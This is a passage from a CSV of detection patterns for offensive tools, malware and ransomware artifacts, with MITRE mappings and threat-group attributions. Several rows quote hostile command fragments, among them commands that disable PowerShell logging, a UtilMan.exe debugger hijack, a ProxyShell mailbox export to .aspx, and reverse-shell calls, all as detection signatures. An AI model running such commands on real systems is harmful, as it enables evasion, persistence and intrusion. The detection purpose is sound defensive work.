Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","53238" "*netview.py*",".{0,1000}netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","53239" "*netview_enum*",".{0,1000}netview_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","53240" "*Netwedx765ork\\Cookedx765ies*",".{0,1000}Netwedx765ork\\\\Cookedx765ies.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","53241" "*Network Password Recovery v*",".{0,1000}Network\sPassword\sRecovery\sv.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. 
This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53242" "*network2john.lua*",".{0,1000}network2john\.lua.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53243" "*networking\dhcp_dns_update_utils.py*",".{0,1000}networking\\dhcp_dns_update_utils\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","53244" "*NetworkMiner*",".{0,1000}NetworkMiner.{0,1000}","offensive_tool_keyword","NetworkMiner","A Network Forensic Analysis Tool (NFAT)","T1040 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","http://www.netresec.com/?page=NetworkMiner","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53245" "*NetworkServiceExploit.exe*",".{0,1000}NetworkServiceExploit\.exe.{0,1000}","offensive_tool_keyword","NetworkServiceExploit","executables for penetration testing Windows Active Directory environments","T1016 - T1046
- T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","NetworkServiceExploit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","53246" "*NetworkServiceExploit.exe*",".{0,1000}NetworkServiceExploit\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","NetworkServiceExploit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","53247" "*nevah.juan@allfreemail.net*",".{0,1000}nevah\.juan\@allfreemail\.net.{0,1000}","offensive_tool_keyword","Dispossessor","email used by the Dispossessor ransomware group notes for data exfiltration","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Data Exfiltration","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#email","N/A","10","10","N/A","N/A","N/A","N/A","53249" "*nevcorps5cvivjf6i2gm4uia7cxng5ploqny2rgrinctazjlnqr2yiyd.onion*",".{0,1000}nevcorps5cvivjf6i2gm4uia7cxng5ploqny2rgrinctazjlnqr2yiyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53250" "*New credentials found for user * on 
*",".{0,1000}New\scredentials\sfound\sfor\suser\s.{0,1000}\son\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","53251" "*New password cracked! MTLM: *",".{0,1000}New\spassword\scracked!\sMTLM\:\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","53252" "*New PORT system. 
You need to create 1 pastebin and insert you ports like this 127.0.0.1:8989:7878:5656*",".{0,1000}New\sPORT\ssystem\.\sYou\sneed\sto\screate\s1\spastebin\sand\sinsert\syou\sports\slike\sthis\s127\.0\.0\.1\:8989\:7878\:5656.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","53253" "*new session to 127.0.0.1:3000*",".{0,1000}new\ssession\sto\s127\.0\.0\.1\:3000.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","53254" "*new Shell('127.0.0.1', 9000)*",".{0,1000}new\sShell\(\'127\.0\.0\.1\',\s9000\).{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#content","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","53255" "*New Victim [{Environment.UserName}*",".{0,1000}New\sVictim\s\[\{Environment\.UserName\}.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - 
TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","53256" "*new WebSocket(""ws://127.0.0.1:4343"")*",".{0,1000}new\sWebSocket\(\""ws\:\/\/127\.0\.0\.1\:4343\""\).{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","53257" "*NewAdminAccountCreation.ps1*",".{0,1000}NewAdminAccountCreation\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","53280" "*NewConsole creates the sliver client (and console)*",".{0,1000}NewConsole\screates\sthe\ssliver\sclient\s\(and\sconsole\).{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","53281" "*New-ElevatedPersistenceOption*",".{0,1000}New\-ElevatedPersistenceOption.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53282" "*New-ElevatedPersistenceOption*",".{0,1000}New\-ElevatedPersistenceOption.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","53283" "*New-GPOImmediateTask*",".{0,1000}New\-GPOImmediateTask.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic 
Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","53284" "*New-HoneyHash*",".{0,1000}New\-HoneyHash.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","New-HoneyHash.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53285" "*New-HoneyHash.ps1*",".{0,1000}New\-HoneyHash\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1086","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53286" 
"*New-InMemoryModule -ModuleName Win32*",".{0,1000}New\-InMemoryModule\s\-ModuleName\sWin32.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53287" "*New-InMemoryModule*",".{0,1000}New\-InMemoryModule.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUACTokenManipulation.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","53288" "*New-Item $C2Output *",".{0,1000}New\-Item\s\$C2Output\s.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","53289" "*New-ItemProperty * ""EnableModuleLogging"" -PropertyType DWord -Value 0*",".{0,1000}New\-ItemProperty\s.{0,1000}\s\""EnableModuleLogging\""\s\-PropertyType\sDWord\s\-Value\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53290" "*New-ItemProperty * ""EnableScriptBlockLogging"" -PropertyType DWord -Value 0*",".{0,1000}New\-ItemProperty\s.{0,1000}\s\""EnableScriptBlockLogging\""\s\-PropertyType\sDWord\s\-Value\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53291" "*New-ItemProperty -Path ""HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UtilMan.exe"" -Name *",".{0,1000}New\-ItemProperty\s\-Path\s\""HKLM\:\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\UtilMan\.exe\""\s\-Name\s.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","#registry","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","53292" "*New-MailBoxExportRequest -Mailbox *@* -FilePath *.aspx*",".{0,1000}New\-MailBoxExportRequest\s\-Mailbox\s.{0,1000}\@.{0,1000}\s\-FilePath\s.{0,1000}\.aspx.{0,1000}","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53296" "*New-NetFirewallRule -DisplayName ""KematianC2"" *",".{0,1000}New\-NetFirewallRule\s\-DisplayName\s\""KematianC2\""\s.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","#firewallrulename","N/A","10","","N/A","","","","53298" "*New-NetFirewallRule -DisplayName 'Windows Update' -Direction Outbound -Action Allow*",".{0,1000}New\-NetFirewallRule\s\-DisplayName\s\'Windows\sUpdate\'\s\-Direction\sOutbound\s\-Action\sAllow.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - 
